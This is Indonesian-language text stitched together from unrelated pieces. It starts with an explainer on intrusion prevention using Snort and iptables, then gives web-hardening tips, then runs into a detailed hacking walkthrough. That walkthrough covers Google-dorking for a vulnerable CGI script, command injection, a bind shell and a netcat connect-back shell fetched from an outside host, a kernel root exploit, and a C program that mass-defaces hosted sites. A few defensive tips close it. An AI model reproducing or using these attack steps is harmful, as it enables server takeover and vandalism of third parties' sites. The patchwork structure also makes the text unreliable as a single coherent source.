Sistem Pencegahan Penyusupan (Intrusion Preventing System atau IPS) adalah suatu tools yang digunakan untuk mencegah adanya penyusupan. Ada 2 fungsi dalam IPS yakni kemampuan mendeteksi penyusupan dan kemampuan untuk mencegah akses penyusupan.Kemampuan mendeteksi penyusupan secara umum disebut IDS (Instrusion Detection System) dan kemampuan untuk mencegah akses dikenal dengan Firewall. Komponen Sistem Pencegahan PenyusupanSistem pencegahan penyusupan harus dapat mendeteksi dan merespon terhadap penyusupan yakni dengan mengkonfigurasi ulang rule firewall yang ada. Untuk itu komponen-komponen yang harus ada pada sistem pencegahan penyusupan meliputi:
• IDS (Intrusion Detection System).
Dilihat dari cara kerja dalam menganalisa apakah paket data dianggap sebagai penyusupan atau bukan, IDS dibagi menjadi 2:knowledge based atau misuse detection dan behavior based atau anomaly based. Knowledge-based IDS dapat mengenali adanya penyusupan dengan cara menyadap paket data kemudian membandingkannya dengan database rule IDS (berisi catatan paket serangan). Jika paket data mempunyai pola yang sama dengan salah satu atau lebih pola di database rule IDS, maka paket tersebut dianggap sebagai serangan, dan demikian juga sebaliknya, jika paket data tersebut sama sekali tidak mempunyai pola yang sama dengan pola di database rule IDS, maka paket data tersebut dianggap bukan serangan.
Sedangkan behavior based (anomaly) dapat mendeteksi adanya penyusupan dengan mengamati adanya kejanggalan-kejanggalan pada sistem, atau adanya penyimpangan-penyimpangan dari kondisi
normal, sebagai contoh ada penggunaan memori yang melonjak secara terus menerus atau ada koneksi parallel dari 1 buah IP dalam jumlah banyak dan dalam waktu yang bersamaan. Kondisi-kondisi diatas
dianggap kejanggalan yang kemudian oleh IDS jenis anomaly based dianggap sebagai serangan.
Sedangkan dilihat dari kemampuan mendeteksi penyusupan pada jaringan, IDS dibagi menjadi 2 yakni: host based dan network based.
Host based mampu mendeteksi hanya pada host tempat implementasi IDS, sedangkan network based IDS mampu mendeteksi seluruh host yang berada satu jaringan dengan host implementasi IDS tersebut. Tulisan ini secara khusus menggunakan IDS jenis knowledge based dan network based.
• Packet Filtering Firewall.
Packet Filtering Firewall dapat membatasi akses koneksi berdasarkan parameter-parameter: protokol, IP asal, IP tujuan, port asal, port tu-juan, chain (aliran data) dan code bit sehingga dapat diatur hanya akses yang sesuai dengan policy saja yang dapat mengakses sistem. Packet filtering firewall ini bersifat statik sehingga fungsi untuk membatasi aksespun statik, misalnya akses ke web server (port 80) di-ijinkan oleh policy, maka dari manapun dan apapun aktifitas terhadap webserver diijinkan walaupun merupakan usaha penetrasi oleh craker. Untuk itulah packet filtering firewall tidak dapat mengatasi gangguan yang bersifat dinamik sehingga harus dikombinasikan dengan IDS untuk membentuk sistem hardening yang maksimal.
• Engine Sistem Pencegahan Penyusupan (IDS-Firewall).
Engine ini bertugas untuk membaca alert dari IDS (antara lain berupa jenis serangan dan IP Address penyusup) untuk kemudian memerintahkan firewall untuk memblok akses koneksi ke sistem dari penyusup tersebut.
Dimana diletakkan Sistem Pencegahan Penyusupan?
Sistem pencegahan penyusupan akan maksimal jika diletakkan di router sehingga daerah kerja sistem ini dapat mencakup semua host yang berada dalam 1 jaringan dengan router tempat mengimplementasikan Sistem Pencegahan Penyusupan. Masalah timbul ketika konsentrator menggunakan switch dimana proses penyadapan yang harus dilakukan dalam proses deteksi penyusupan menjadi tidak berfungsi, salah satu cara yang mudah untuk mengatasi masalah ini adalah dengan melakukan spoofing MAC address terhadap host-host yang akan diamati. Posisi sistem pencegahan penyusupan untuk menghasilkan hasil yang maksimal.
Sistem Pencegahan Penyusupan berupa IDS dan Firewall yang diimplementasikan di router/gateway antara internet-DMZ digunakan untuk melindungi server-server yang berada di wilayah DMZ dari kemungkinan serangan dari internet, sedangkan yang diimplentasikan antara jaringan DMZ-intranet digunakan untuk melindungi kemungkinan serangan dari intranet ke wilayah DMZ maupun internet.Snort IDS dan IPTables Firewall
Seperti dijelaskan sebelumnya, sistem pencegahan penyusupan dibangun dari 2 komponen utama yakni IDS dan Firewall. Dalam pembahasan ini, IDS yang digunakan adalah Snort (www.snort.org) sedangkan firewall yang digunakan adalah Iptables yang merupakan firewall bawaan Linux.
Snort IDS
Snort IDS merupakan IDS open source yang secara defacto menjadi standar IDS di industri. Snort dapat didownload di situs www.snort.org. Snort dapat diimplementasikan dalam jaringan yang multiplatform, salah satu kelebi-hannya adalah mampu mengirimkan alert dari mesin Unix atupun Linux ke platform Microsoft Windows dengan melalui SMB. Snort dapat berkerja dalam 3 mode: sniffer
mode (penyadap), packet logger dan network intrusion detection mode. Tentunya mode kerja yang akan digunakan dalam membangun sistem pencegahan penyusupan dalam mode kerja network intrusion
dection. Penyusupan (intrusion) didefinisikan sebagai kegiatan yang bersifat anomaly, incorrect atau inappropriate yang terjadi di jaringan atau di host.
Komponen-komponen Snort IDS meliputi:
• Rule Snort
Rule Snort merupakan database yang berisi pola-pola serangan berupa signature jenis-jenis serangan. Rule Snort IDS ini, harus diupdate secara rutin agar ketika ada suatu teknik serangan yang baru, serangan tersebut dapat terdeteksi. Rule Snort dapat didownload di www.snort.org.
Dari rule-rule seperti di ataslah IDS Snort menentukan apakah sebuah paket data dianggap sebagai penyusupan/serangan atau bukan, paket data dibandingkan dengan rule IDS, jika terdapat dalam rule, maka paket data tersebut dianggap sebagai penyusupan/serangan dan demikian juga sebaliknya jika tidak ada dalam rule maka dianggap bukan penyusupan/serangan.
• Snort Engine
Snort Engine merupakan program yang berjalan sebagai daemon proses yang selalu bekerja untuk membaca paket data dan kemudian mem-bandingkannya dengan rule Snort. Dalam sistem Linux, untuk
mende-teksi apakah snort engine dalam keadaan aktif atau tidak dengan melihat prosesnya seperti contoh di bawah ini:
[root@localhost rules] # ps aux | grep snort
root 3060 0.0 1.3 9188 820 ? S Jun03 0:04 [snort]
Contoh diatas menunjukkan bahwa snort engine dalam keadaan aktif dengan proses ID 3060 dan dijalankan oleh user "root"
• Alert
Alert merupakan catatan serangan pada deteksi penyusupan. Jika snort engine menghukumi paket data yang lewat sebagai serangan, maka snort engine akan mengirimkan alert berupa log file. Untuk kebutuhan analisa, alert dapat disimpan di dalam database, sebagai contoh ACID (Analysis Console for Intrusion Databases) sebagai modul tambahan pada Snort.
Contoh alert sebagai berikut:
[**] [1:499:3] ICMP Large ICMP Packet [**] [Classification:
Potentially Bad Traffic] [Priority: 2] 05/09-20:15:14. 895348
10.1.4.113 -> 10.1.3.126 ICMP TTL:128 TOS:0x0 ID:6316
IpLen:20 DgmLen:65528 Type:8 Code:0 ID:512 Seq:3072 ECHO
[Xref => http://www.whitehats.com/info/IDS246]
Contoh alert di atas merupakan alert ketika terdapat paket data dalam ukuran besar dari IP Address 10.1.4.113 ke 10.1.3.126 yang dianggap sebagai serangan oleh Snort karena pola paket data tersebut terdapat dalam rule Snort.
Hubungan ketiga komponen IDS dijelaskan dalam gambar berikut:
IPTables Firewall
IPTables merupakan firewall bawaan Linux. Iptables mampu melakukan filtering dari layer transport sampai layer fisik. Sebagai contoh rule dalam sebuah firewall akan menutup semua koneksi kecuali ke port 80 protokol TCP, atau sebuah rule firewall mendefiniskan bahwa yang dapat melakukan koneksi hanya paket data yang berasal dari MAC address 00-80-48-24-3b-e5. Variabel-variabel dalam Iptables Firewall meliputi:
• Protokol, contoh: tcp, udp, icmp
• Port asal, contoh: port yang lebih besar dari 1023
• Port tujuan, contoh: port 21, 22, 80
• IP asal/Jaringan asal: contoh 202.91.8.112, 202.62.9.216/28
• IP tujuan/Jaringan tujuan: contoh 202.91.8.112,202.62.9.216/28
• Chain (aliran), contoh: INPUT, OUTPUT, FORWARD (khusus router)
• Code bit (flag), contoh: SYN, ACK.
Contoh rule firewall pada Iptables sebagai berikut:
iptables -A FORWARD -p tcp -d 202.91.8.112 —dport 80 –j ACCEPT
iptables -A FORWARD -p tcp -d 202.91.8.112 -j DROP
Rule di atas mendefinisikan bahwa semua paket data dengan protocol tcp dari manapun yang menuju 202.91.8.112 ditolak semua kecuali yang menuju ke port 80.
Written by islamarket.net
Sunday, 10 May 2009 17:27 –
Berikut ini adalah beberapa tips dalam Membangun Websites yang tidak mudah di jebol Hacker. Tips ini dibuat oleh moderator komunitas white hacker Yogyafree, Nathan Gusti Ryan.Sehubungan dengan maraknya deface atau hacking isi websites pemerintah maupun organisasi besar maka berikut ini berbagai tips yang dapat dilakukan oleh web administrator untuk membangun Webserver yang tangguh dan tidak mudah dibobol oleh Hacker.
Tips Pertama
Pada umumnya, hosting websites dilakukan pada ISP (Internet Service Provider) dengan space tertentu, lalu kita melakukan upload website via FTP atau via CPANEL (Control Panel).Webhosting inilah yang rawan dan mudah sekali dibobol oleh Hacker di antaranya mengunakan teknik SQL Injection. Maka disarankan agar mengunakan Server sendiri dan mengunakan VPS (Virtual Private Server). Dengan Server sendiri atau Virtual Private Server bisa mengunakan berbagai proteksi terhadap kita secara Customized. Beda dengan Web Hosting, proteksi security dilakukan terserah apa kata ISP. Kelemahan proteksi inilah yang dimanfaatkan oleh Hacker dengan melakukan Port Scanning untuk menemukan celah security yang bisa ditembus untuk bisa masuk dan mengambil alih websites tersebut.
Tips Kedua
Mengunakan Hardware Security yang powerfull diantaranya yang memiliki fitur Firewall, IDS (Intrusion Detection System) dan IPS (Intrusion Prevention System). Contohnya mengunakan Fortigate, Cisco Series Security, 3Com Tipping Point, dan lainnya. Dapat juga mengunakan software IDS seperti Black ICE Countermeasures ataupun Distro Linux untuk security system seperti Smootwall, Monowall, Customized Distro Linux, dan lainnya. Umumnya, baik software maupun hardware security ini bisa secara otomatis mengirimkan email alert bahkan bisa mengirimkan alert via SMS jika system mendeteksi adanya serangan dari hacker.
Tips Ketiga
Mengunakan system yang Stable yang sudah perfect systemnya, sehingga kemungkinan adanya celah keamanan juga dapat diminimalkan. Banyaknya software atau tool web builder dengan berbagai versi terutama versi gratis/ free License/ Freeware, sebaiknya para pemakai memilih versi yang sudah dinyatakan Stable. Seperti adanya BUG pada software Joomla versi 1.5.0 - 1.5.5.
Tips Keempat
Web Administrator/ System Administrator harus melakukan Review, Testing, Simulasi secara berkala terhadap keamanan pada Server yang dikelolanya. Bahkan bisa bekerja sama dengan Hacker (White Hacker yang dapat dipercaya reputasinya) untuk melakukan Audit terhadap implementasi Security webservernya.
Banyak sekali tujuan sebuah proses hacking terhadap server, ada sebagian orang
melakukan hacking hanya sebatas deface, untuk tujuan carding, untuk mendapat full
akses (root priviledges) server, ada juga yang bertujuan untuk mematikan servis sistem dan network (Denial of Services). Proses hacking dapat dilakukan secara acak ataupun tertarget, acak dalam artian attacker melakukan proses hacking secara masal misal dengan bantuan search engine google, sedangkan tertarget maksudnya attacker
melakukan hacking terhadap sebuah sistem atau server tertentu. Pada kesempatan kali ini penulis mo sharing ma temen-temen bagaimana root priviledge server sebuah hosting bisa di peroleh attacker dengan bantuan search engine (proses hacking acak).
Banyak sekali orang beranggapan bahwa tanggung jawab sekuritas sistem dalam sebuah server anggaplah server hosting adalah tanggun jawab dari sysadmin sedangkan para webmaster site hanya berpikir agar sitenya dikunjungi dan banyak sekali para webmaster (walaupun gak semua) yang mengacuhkan sekuritas. Upzz, inilah jalan masuk terbaik bagi attacker untuk masuk ke sistem, why..?? Tentu saja karena port 80 yang harus selalu terbuka. Lalu bagaimana root priviledge sebuah server diperoleh..?? Berikut ini detail teknik yang sering dipakai oleh para attacker untuk memperoleh tujuan full akses.Hole via URL yang biasa dipakai untuk memperoleh full akses terhadap sistem adalah hole remote ekskusi seperti PHP injection dan CGI remote execution. Sebuah assumsi bahwa dalam sebuah hosting ada salah satu webmaster yang menggunakan software vulnerable yang belum terpatch misalnya w_s3adix.cgi yang di produksi oleh Y.SAK. Berikut hole dari w_s3adix.cgi yang ditemukan oleh blahpok a.k.a choi GSO community w_s3adix.cgi?st=parameter&re=parameter& o=file.txt|command|.
Tahap pertama yang dilakukan oleh para attacker adalah menggunakan search engine google untuk mencari website yang menginstall software w_3sadix.cgi vulnerable missal dalam box keyword di isi dengan allinurl : w_3sadix.cgi? no= . Setelah attacker mendapatkan sasarannya inilah saat attacker mencoba-coba bagaimana dia memperoleh full akses terhadap sistem. Untuk memperoleh root priviledges dari hole via URL seorang attacker harus bisa memperoleh lokal shell sistem, ada dua cara yang biasa dipakai para attacker untuk memperoleh lokal shell yaitu menggunakan bindty dan teknik connectback.
Perlu digaris bawahi bahwa hole yang digunakan untuk memperoleh shell adalah
hole remote ekskusi yang memungkinkan bagi attacker untuk mengakses command
sistem (console) via browser. Sehingga dari browser attacker bisa mendownload file ke sistem target, mengkompile dan mengekskusinya. Download script bindty ke sistem
target, kompile dan ekskusi.http://student.te.ugm.ac.id/~phoenix03/audit/bindedit.c => Code bindty shell by sd then modified by KillFinger then Modified again by Ph03n1X.
Misal anda menggunakan website http://webmu.com/bind.c untuk menghosting script bindty maka download script bindty itu ke server sistem target untuk memperoleh shell lokal target. Tentunya anda harus mendownload script tadi ke directory yang bisa anda tulisi misalnya /tmp tau /var/tmp. Kemudian kompile dan eksekusi http://www.target.com/w_s3adix.cgi?st=parameter&re=parameter&no=file.txt|wget
http://webmu.com/bind.c -O /var/tmp/bind.c| http://www.target.com w_s3adix.cgi?st=parameter&re=parameter&no=file.txt|gcc -o /var/tmp/bind /var/tmp/bind.c;/var/tmp/bind 4000|
Lihat diatas kita menggunakan port 4000 sebagai binding port, sekarang cek apakah port 4000 terbuka, scan dengan phnxscan.c yang dibuat penulis, anda dapat mendownload source kodenya di http://student.te.ugm.ac.id/~phoenix03/tutorial/phnxscan.c. Kompile dan ekskusi script tadi menggunakan gcc dan scanlah port 4000 servet www.target.com.myshell~>gcc -o phnxscan phnxscan.c
myshell~> ping -c 2 target.com
PING target.com (210.189.77.28): 56 data bytes
64 bytes from 210.189.77.28: icmp_seq=0 ttl=38 time=428.044 ms
64 bytes from 210.189.77.28: icmp_seq=1 ttl=38 time=428.624 ms
--- target.com ping statistics ---
2 packets transmitted, 2 packets received, 0.0% packet loss
round-trip min/avg/max/std-dev = 428.044/428.334/428.624/0.290 ms
myshell~> phnxscan -p 4000 -s 210.189.77.28
port 4000 (tcp) terbuka
Telnet server target port 4000, jika berhasil maka anda akan disuruh memasukkan
password yang default dari scriptnya changeme
myshell~> telnet 210.189.77.28 4000
Trying 210.189.77.28...
Connected to target.com (210.189.77.28).
Escape character is '^]'.
passwd changeme
changeme
=- WELCOME TO THE SERVER -=
sh-2.05b$
Cara kedua untuk menaklukan lokal shell target adalah dengan metode connect-back menggunakan scipt buatan AresU dari 1stlink.
http://student.te.ugm.ac.id/~phoenix03/audit/backup.pl => Coded By AresU
Seperti halnya menggunakan bindty, download script connect-back ke server target ke
directory yang bisa ditulisi misalnya /tmp atau /var/tmp.
http://www.target.com/w_s3adix.cgi?st=parameter&re=parameter&no=file.txt|wget
http://webmu.com/back.pl -O /var/tmp/back.pl|
Kemudian jalankan netcat di box anda dengan option port listen -l, box anda harus
mempunyai IP publik sehingga bisa di akses cross internet (misal 212.123.24.190).
Ekskusi script connect-back yang sudah di download di server target melalui browser.
myshell~> nc -l 21
www.target.com/w_s3adix.cgi?st=parameter&re=parameter&no=file.txt|perl
/var/tmp/back.pl 212.123.24.190 21|
Kemudian lihat box anda.....
myshell~>nc -l 21
(c)AresU Connect-Back Backdoor Shell v1.0
1ndonesia Security Team (1st)
Linux xxxxxxxxxxx 2.4.20-8 #1 Thu Mar 13 16:42:56 EST 2003 i586 i586 i386
GNU/Linux
uid=502(apache) gid=502(apache) groups=502(apache)
cat /etc/issue
Red Hat Linux release 9 (Shrike)
Kernel \r on an \m
Weksss, di sini penulis memperoleh target server Red Hat 9 (Shrike) yang versi kernelnya
2.4.20-8, kernel ini secara default memiliki hole lokal do_brk() yang kalo gak di patch
maka privledge root bisa diperoleh. Sebuah eksploits yang biasa digunakan untuk
mengekploitasi bug ini adalah hatorihanzo.c yang bisa anda download di link berikut
http://student.te.ugm.ac.id/~phoenix03/audit/hatorihanzo.c .
Kemudian ikuti step step berikut :
wget http://student.te.ugm.ac.id/~phoenix03/audit/hatorihanzo.c
--04:00:20-- http://student.te.ugm.ac.id/%7Ephoenix03/audit/hatorihanzo.c
=> `hatorihanzo.c'
Resolving student.te.ugm.ac.id... done.
Connecting to student.te.ugm.ac.id[222.124.24.19]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6,510 [text/plain]
0K ...... 100% 9.35 KB/s
04:00:24 (9.35 KB/s) - `hatorihanzo.c' saved [6510/6510]
gcc -static -o hatori hatorihanzo.c
ls -al
total 440
drwxrwxrwt 2 root root 4096 Sep 3 04:00 .
drwxr-xr-x 18 root root 4096 Sep 9 2004 ..
-rwxr-xr-x 1 root root 428460 Sep 3 04:00 hatori
-rw-r--r-- 1 root root 6510 Dec 16 2003 hatorihanzo.c
./hatori (wait a moment)
id
uid=0(root) gid=0(root)
Binggo, Sekarang anda memperoleh shell root target, yah sekarang anda adalah
mahadewa di sistem itu :P~. Lalu bagaimana masalah backdooring hmm, cari referensinya di google, gunakan keyword sshdoor, shv dan lainnya. Sekarang penulis
hanya hendak berbagi pengalaman tentang mass defacing server target (Assumsi penulis bahwa server yang ditaklukan adalah server hosting). Untuk mengetahui di folder mana website-website di server itu disimpan, cari file konfigurasi apache httpd.conf, baca dan perhatikan baik-baik dimana DocumentRoot dari website yang ada.
find / -name httpd.conf |
/usr/local/apache2/conf/httpd.conf
cat /usr/local/apache2/conf/httpd.conf
Berikut ini konfigurasi virtual domain yang didapat :
ServerName xxxxxxxx.jp
ServerAdmin webmaster@xxxxxxx.jp
ServerAlias xxxxxxx.jp
ScriptAlias /cgi-bin/ /home/beso-kbkb/public_html/cgi-bin/
DocumentRoot /home/beso-kbkb/public_html
user xxxxxxxx
group xxxxxxxx
CustomLog logs/210.189.77.28:80-www.xxxxxxx.jp-access.log combined
ErrorLog logs/210.189.77.28:80-www.xxxxxxxx.jp-error.log
CustomLog /home/members/public_html/logs/ xxxxxxxx /access_log combined
#LCControlDomain kbkb.beso.jp
AliasMatch ^/~([^/]+)/(.*) /home/lcvirtualdomain/ xxxxxxxx.jp/users/$1/public_html/$2
ServerName xxxxxxxx.ne.jp
ServerAdmin webmaster@ xxxxxxxx.ne.jp
ServerAlias xxxxxxxx.ne.jp
ScriptAlias /cgi-bin/ /home/ xxxxxxxx /public_html/cgi-bin/
DocumentRoot /home/ xxxxxxxx /public_html
user xxxxxxxx
group xxxxxxxx
CustomLog logs/210.189.77.28:80-www. xxxxxxxx.ne.jp-access.log combined
ErrorLog logs/210.189.77.28:80-www. xxxxxxxx.ne.jp-error.log
CustomLog /home/members/public_html/logs/ xxxxxxxx/access_log combined
#LCControlDomain xxxxxxxx.ne.jp
AliasMatch ^/~([^/]+)/(.*) /home/lcvirtualdomain/
xxxxxxxx.ne.jp/users/$1/public_html/$2
Sekarang bisa anda lihat bahwa DocumentRoot dari masing-masing website adalah
/home/nama-website/public_html/ dan semua website terletak di subdirectory /home.
Untuk melakukan deface masal lakukan langkah-langkah berikut :
cd /home
ls > host.txt
Kemudian buat script berikut, terserah bagaimana cara anda yang jelas script ini beserta hasil ekskusinya harus di simpan di directory /home.
#include "stdio.h"
/* Coded By Ph03n1X
king_purba@yahoo.co.uk
student.te.ugm.ac.id/~phoenix03
*/
main()
{
FILE *ax;
char aa[1000],bb[1000];
if((ax=fopen("host.txt","r"))==NULL)
{
printf("Gagal\n");
exit(0);
}
while(fgets(aa,sizeof(aa),ax))
{
aa[strlen(aa)-1]='\0';
snprintf(bb,sizeof(bb),"echo hack by Ph03n1X > %s/public_html/deface.txt",aa);
system(bb);
}s
ystem("find /home -name deface.txt > result.txt");
}
Simpan script diatas sebagai file berekstensi .c misal deface.c, kompile dan ekskusi di
folder /home.
gcc -o deface deface.c
./deface
Sekarang lihat hasil deface masal anda di file result.txt yang dihasilkan dari ekskusi script diatas.Setelah bisa menjebol sistem, tentu tidaklah lengkap kalo tidak bisa menambalnya. Lalu bagaimanakah seorang sysadmin seharusnya untuk meminimalkan kejadian seperti ini.
lihatlah bahwa hole awal sistem adalah hole user dalam hal ini webmaster salah satu
website yang di hosting di server, maka tidaklah mungkin untuk bisa memantau semua
user apalagi kalo jumlahnya cukup banyak. Berikut beberapa tips untuk meminimalkan
kejadian seperti ini.
1. Sering-seringlah check directory /tmp dan /var/tmp karena ini adalah directory
favorit para intruder.
2. Sering-seringlah melakukan checking terhadap logs sistem seperti access_logs
apache, /var/log/authlog, /var/logs/adduser dan lain-lainnya
3. Buatlah directory /tmp dalam partisi hardisk terpisah, kemudian hapus directory
/var/tmp default dan ganti dengan ln -s /tmp /var/tmp
Berikan option noexec dan nosuid di partis /tmp melalui /etc/fstab misalnya :
/dev/wd0h /tmp ffs rw,noexec,noatime,nodev,nosuid 1 2
4. Kemudian jika anda menggunakan script server side, disable semua fungsi yang
digunakan untuk mengakses command system. Misalnya untuk PHP disable
fungsi-fungsi berikut dari php.ini disable_functions = escapeshellarg, escapeshellcmd, exec, passthru, proc_close, proc_get_status, proc_nice, proc_open,proc_terminate, shell_exec, system
5. Gunakan firewall dengan default deny terutama untuk semua koneksi masuk dan
forward.
6. Selalu melakukan patching jika hole baru ditemukan, untuk ini dituntut kerja
keras admin dalam mencari informasi.
Mudah-mudahan tulisan ini bermanfaat walaupun singkat :P~
REFERENSI :
http://google.co.id
http://bosen.net
http://jasakom.com
http://echo.or.id
